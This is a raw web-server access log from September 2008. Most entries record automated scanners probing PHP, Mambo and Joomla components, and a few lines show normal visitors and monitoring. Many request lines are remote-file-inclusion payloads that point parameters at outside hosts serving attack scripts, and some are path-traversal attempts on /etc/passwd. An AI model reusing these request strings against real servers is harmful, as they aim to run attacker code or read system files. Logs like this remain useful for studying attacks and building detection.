91.186.15.66 - - [02/Sep/2008:01:26:08 -0400] "GET //?custompluginfile[]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
89.186.1.54 - - [02/Sep/2008:01:29:55 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Sep/2008:01:29:55 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Sep/2008:01:29:56 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.800"
213.165.80.16 - - [02/Sep/2008:01:30:00 -0400] "GET /logs/error_log.Q108080200//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Sep/2008:01:30:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.84.193.130 - - [02/Sep/2008:01:30:08 -0400] "GET //include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/naijaid.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:30:28 -0400] "GET //include.php?path[docroot]=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:30:28 -0400] "GET /logs//include.php?path[docroot]=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:30:29 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
194.135.105.1 - - [02/Sep/2008:01:30:43 -0400] "GET /logs/access_log.Q108052400//?path%5Bdocroot%5D=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
190.138.154.11 - - [02/Sep/2008:01:31:06 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
190.138.154.11 - - [02/Sep/2008:01:31:06 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
190.138.154.11 - - [02/Sep/2008:01:31:06 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
190.138.154.11 - - [02/Sep/2008:01:31:06 -0400] "GET /logs/error_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
147.144.1.212 - - [02/Sep/2008:01:31:10 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.812"
147.144.1.212 - - [02/Sep/2008:01:31:10 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.812"
147.144.1.212 - - [02/Sep/2008:01:31:11 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.812"
147.144.1.212 - - [02/Sep/2008:01:31:11 -0400] "GET /logs/error_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.812"
147.144.1.212 - - [02/Sep/2008:01:31:13 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.812"
70.84.193.130 - - [02/Sep/2008:01:32:06 -0400] "GET /logs/access_log.Q108052400//include.php?path[docroot]=http://www.hotelsunflower.it/modules/rhs/idv6.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
147.144.1.212 - - [02/Sep/2008:01:33:03 -0400] "GET /logs/access_log.Q108081300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.812"
147.144.1.212 - - [02/Sep/2008:01:33:03 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.812"
147.144.1.212 - - [02/Sep/2008:01:33:05 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
147.144.1.212 - - [02/Sep/2008:01:33:10 -0400] "GET /logs/error_log.Q108081300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 284 "-" "libwww-perl/5.812"
193.110.89.6 - - [02/Sep/2008:01:33:15 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 257 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
193.110.89.6 - - [02/Sep/2008:01:33:16 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 262 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
190.83.18.253 - - [02/Sep/2008:01:33:31 -0400] "GET //index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
190.83.18.253 - - [02/Sep/2008:01:33:31 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
190.83.18.253 - - [02/Sep/2008:01:33:59 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://sylacaugaonline.info/joomla/idr.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
70.84.193.130 - - [02/Sep/2008:01:34:18 -0400] "GET /logs/access_log.Q108052400//include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/naijaid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
66.147.239.184 - - [02/Sep/2008:01:34:28 -0400] "GET /logs/access_log.Q108060700/errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.147.239.184 - - [02/Sep/2008:01:34:28 -0400] "GET /errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
66.147.239.184 - - [02/Sep/2008:01:34:28 -0400] "GET /logs/errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
89.186.1.54 - - [02/Sep/2008:01:34:29 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.800"
209.59.12.99 - - [02/Sep/2008:01:35:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.147.239.184 - - [02/Sep/2008:01:35:35 -0400] "GET /logs/access_log.Q108080800/errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
74.6.8.96 - - [02/Sep/2008:01:35:29 -0400] "GET /logs/error_log.Q108060300 HTTP/1.0" 200 507037 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.67.202.195 - - [02/Sep/2008:01:35:52 -0400] "GET /logs/access_log.Q108080800/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.68"
212.67.202.195 - - [02/Sep/2008:01:35:52 -0400] "GET /errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.68"
212.67.202.195 - - [02/Sep/2008:01:35:54 -0400] "GET /logs/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.68"
66.147.239.184 - - [02/Sep/2008:01:36:02 -0400] "GET /logs/access_log.Q108082200/errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.147.239.184 - - [02/Sep/2008:01:36:02 -0400] "GET /errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
66.147.239.184 - - [02/Sep/2008:01:36:02 -0400] "GET /logs/errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
89.186.1.54 - - [02/Sep/2008:01:36:23 -0400] "GET /logs/access_log.Q108071500///admin/business_inc/saveserver.php?thisdir=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Sep/2008:01:36:23 -0400] "GET ///admin/business_inc/saveserver.php?thisdir=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Sep/2008:01:36:23 -0400] "GET /logs///admin/business_inc/saveserver.php?thisdir=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Sep/2008:01:36:37 -0400] "GET /logs/error_log.Q108051800///admin/business_inc/saveserver.php?thisdir=http://ploplop123.x10hosting.com/rfi/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.800"
212.67.202.195 - - [02/Sep/2008:01:36:56 -0400] "GET /logs/access_log.Q108080300/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.68"
212.67.202.195 - - [02/Sep/2008:01:37:05 -0400] "GET /errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.68"
212.67.202.195 - - [02/Sep/2008:01:37:06 -0400] "GET /logs/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.68"
212.67.202.195 - - [02/Sep/2008:01:37:06 -0400] "GET /logs/access_log.Q108082200/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.68"
67.41.4.26 - - [02/Sep/2008:01:37:12 -0400] "GET /logs/errors.php?error=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.41.4.26 - - [02/Sep/2008:01:37:12 -0400] "GET /errors.php?error=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.147.239.184 - - [02/Sep/2008:01:37:24 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://www.alpenverein-bb.de/touren/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
67.41.4.26 - - [02/Sep/2008:01:37:29 -0400] "GET /logs/errors.php?error=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.41.4.26 - - [02/Sep/2008:01:37:30 -0400] "GET /errors.php?error=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
212.67.202.195 - - [02/Sep/2008:01:37:46 -0400] "GET /logs/error_log.Q108072300/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.68"
81.173.252.119 - - [02/Sep/2008:01:38:42 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jamy.bplaced.net/id.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
212.67.202.195 - - [02/Sep/2008:01:38:43 -0400] "GET /logs/access_log.Q108072300/errors.php?error=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.68"
81.173.252.119 - - [02/Sep/2008:01:38:44 -0400] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jamy.bplaced.net/id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.808"
147.144.1.212 - - [02/Sep/2008:01:38:44 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.812"
81.173.252.119 - - [02/Sep/2008:01:38:45 -0400] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jamy.bplaced.net/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
164.41.101.38 - - [02/Sep/2008:01:38:57 -0400] "GET /logs/error_log.Q108081300/admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
164.41.101.38 - - [02/Sep/2008:01:38:57 -0400] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
164.41.101.38 - - [02/Sep/2008:01:38:57 -0400] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
164.41.101.38 - - [02/Sep/2008:01:38:57 -0400] "GET /logs/access_log.Q108081300/admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
81.173.252.119 - - [02/Sep/2008:01:39:01 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://jamy.bplaced.net/id.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
74.6.8.96 - - [02/Sep/2008:01:39:01 -0400] "GET /logs/error_log.Q107071300 HTTP/1.0" 200 141900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.147.236.10 - - [02/Sep/2008:01:39:45 -0400] "GET /logs/access_log.Q108071000/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.76"
217.147.236.10 - - [02/Sep/2008:01:39:51 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 247 "-" "libwww-perl/5.76"
217.147.236.10 - - [02/Sep/2008:01:39:52 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 252 "-" "libwww-perl/5.76"
217.147.236.10 - - [02/Sep/2008:01:39:57 -0400] "GET /logs/access_log.Q108062600/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 274 "-" "libwww-perl/5.76"
209.59.12.99 - - [02/Sep/2008:01:40:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.84.193.130 - - [02/Sep/2008:01:40:26 -0400] "GET /logs/access_log.Q108052400//include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/bigdozid.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
205.211.11.1 - - [02/Sep/2008:01:41:08 -0400] "GET //components/errors.php?error=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:41:08 -0400] "GET /logs/error_log.Q108081100//components/errors.php?error=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:41:08 -0400] "GET /logs//components/errors.php?error=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
65.36.166.240 - - [02/Sep/2008:01:42:16 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:01:42:16 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
205.211.11.1 - - [02/Sep/2008:01:42:16 -0400] "GET /logs/access_log.Q108061500//components/errors.php?error=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
65.36.166.240 - - [02/Sep/2008:01:42:17 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
164.41.101.38 - - [02/Sep/2008:01:43:00 -0400] "GET /!scanhttp://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:44:00 -0400] "GET /logs/access_log.Q108081100//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:44:00 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:44:00 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
91.186.15.66 - - [02/Sep/2008:01:44:01 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 257 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
91.186.15.66 - - [02/Sep/2008:01:44:01 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
217.147.236.10 - - [02/Sep/2008:01:44:46 -0400] "GET /logs/error_log.Q108071100//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 298 "-" "libwww-perl/5.76"
205.211.11.1 - - [02/Sep/2008:01:44:50 -0400] "GET /logs/access_log.Q108081300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
217.147.236.10 - - [02/Sep/2008:01:44:53 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://l33tunix.t35.com/TT?? HTTP/1.1" 404 277 "-" "libwww-perl/5.76"
209.59.12.99 - - [02/Sep/2008:01:45:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.36.166.240 - - [02/Sep/2008:01:45:50 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:01:45:50 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:01:45:50 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
80.93.57.211 - - [02/Sep/2008:01:45:51 -0400] "GET /errors.php?error=http://scrumpyonline.co.uk/mambo/media/on.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
74.53.199.146 - - [02/Sep/2008:01:45:57 -0400] "GET /logs/access_log.Q108081900//index.php?prefix=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.53.199.146 - - [02/Sep/2008:01:45:57 -0400] "GET /logs//index.php?prefix=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
74.53.199.146 - - [02/Sep/2008:01:45:57 -0400] "GET //index.php?prefix=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
205.211.11.1 - - [02/Sep/2008:01:46:02 -0400] "GET /logs/access_log.Q108082300//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:46:04 -0400] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:46:04 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
205.211.11.1 - - [02/Sep/2008:01:46:06 -0400] "GET /logs/error_log.Q108070300//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://smba.jinju.ac.kr/id.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
89.248.110.152 - - [02/Sep/2008:01:46:25 -0400] "GET //index.php?prefix=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.248.110.152 - - [02/Sep/2008:01:46:25 -0400] "GET /logs/access_log.Q108081900//index.php?prefix=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.248.110.152 - - [02/Sep/2008:01:46:25 -0400] "GET /logs//index.php?prefix=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
76.212.137.165 - - [02/Sep/2008:01:46:30 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.212.137.165 - - [02/Sep/2008:01:46:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.53.199.146 - - [02/Sep/2008:01:46:34 -0400] "GET /logs/error_log.Q108051700//index.php?prefix=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
76.212.137.165 - - [02/Sep/2008:01:46:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.212.137.165 - - [02/Sep/2008:01:46:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
89.248.110.152 - - [02/Sep/2008:01:47:03 -0400] "GET /logs/error_log.Q108051700//index.php?prefix=http://www.nwstars.com/readme.txt%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
74.6.8.96 - - [02/Sep/2008:01:46:59 -0400] "GET /logs/access_log.Q107120800 HTTP/1.0" 200 1022024 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.135.105.1 - - [02/Sep/2008:01:47:27 -0400] "GET /logs/access_log.Q108081900/?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:47:27 -0400] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
81.23.226.2 - - [02/Sep/2008:01:47:28 -0400] "GET /logs/access_log.Q108082400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.correiios.com/id.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.67"
81.23.226.2 - - [02/Sep/2008:01:47:28 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.correiios.com/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.67"
81.23.226.2 - - [02/Sep/2008:01:47:28 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.correiios.com/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.67"
194.135.105.1 - - [02/Sep/2008:01:47:27 -0400] "GET /logs/?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 200 63996 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:47:47 -0400] "GET /logs/access_log.Q108081200/?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
76.212.137.165 - - [02/Sep/2008:01:47:53 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75294 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
76.212.137.165 - - [02/Sep/2008:01:47:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 75294 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.9.233.10 - - [02/Sep/2008:01:48:12 -0400] "GET /faqsupport/index4016.php/faqsupport/include.php?path[docroot]=http://acc-advertising.com/img/originid.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.810"
